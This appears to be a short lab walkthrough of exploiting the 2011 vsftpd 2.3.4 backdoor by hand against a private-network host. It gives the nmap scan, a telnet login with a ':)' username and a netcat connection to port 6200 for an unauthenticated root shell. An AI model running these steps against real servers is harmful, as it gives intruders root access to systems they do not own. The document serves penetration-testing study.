vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL distributions.
nmap -p0-65535 192.168.2.129
root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
In July 2011 it was discovered that the vsftpd 2.3.4 source archive offered on the project's master download site had been replaced with a backdoored copy. On a server built from that archive, any client that sends a username containing the two characters ":)" gets a command shell listening on TCP port 6200; the shell runs as root because the trigger fires before vsftpd drops privileges. This was not a vulnerability in vsftpd itself: someone had uploaded a modified release archive containing the backdoor. The download site was subsequently moved to Google App Engine.
Let's try to exploit it without Metasploit.
Connect to the vsFTPd server and log in with USER and PASS.
Note: the user name must contain the smiley ":)" (a colon immediately followed by a closing parenthesis, with no space between them), because the backdoored code looks for exactly those two bytes. The password can be anything.
When a USER command containing ":)" arrives, the backdoored daemon binds TCP port 6200 on the FTP server and waits for a connection; whoever connects to that port is handed a shell.
root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER invalid:)
331 Please specify the password.
PASS dont know
^]
telnet> quit
Connection closed.
Close the telnet session and connect to port 6200 on the same host with netcat or telnet:
nc 192.168.2.129 6200
telnet 192.168.2.129 6200
The connection on port 6200 is a shell with no authentication at all. There is no prompt, so type a command such as id or uname -a to confirm that it works and to see which user it runs as.